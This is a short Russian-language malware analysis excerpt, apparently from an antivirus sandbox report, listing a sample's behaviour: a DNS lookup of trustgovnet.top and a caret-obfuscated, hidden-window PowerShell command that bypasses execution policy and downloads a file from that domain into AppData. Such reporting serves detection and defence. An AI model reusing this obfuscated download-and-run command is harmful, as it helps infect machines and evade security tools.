Техническая информация
- http://trustgovnet.top/search.php как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "Po^W^e^R^shell.exe -ExeCUTI^ONpo^lIcY^ bypaSs^ -^nopr^O^FIle -windOw^STyl^e^ ^hIdd^e^n (^nEW-OBJ^E^Ct SY^S^t^E^M^.ne^T.w^eBc^liE^NT).^dOWN^L^o^Ad^FiL^e(^'http://trustgovnet.top/se...
- DNS ASK tr###govnet.top
- '<SYSTEM32>\cmd.exe' /c "Po^W^e^R^shell.exe -ExeCUTI^ONpo^lIcY^ bypaSs^ -^nopr^O^FIle -windOw^STyl^e^ ^hIdd^e^n (^nEW-OBJ^E^Ct SY^S^t^E^M^.ne^T.w^eBc^liE^NT).^dOWN^L^o^Ad^FiL^e(^'http://trustgovnet.top/se...' (со скрытым окном)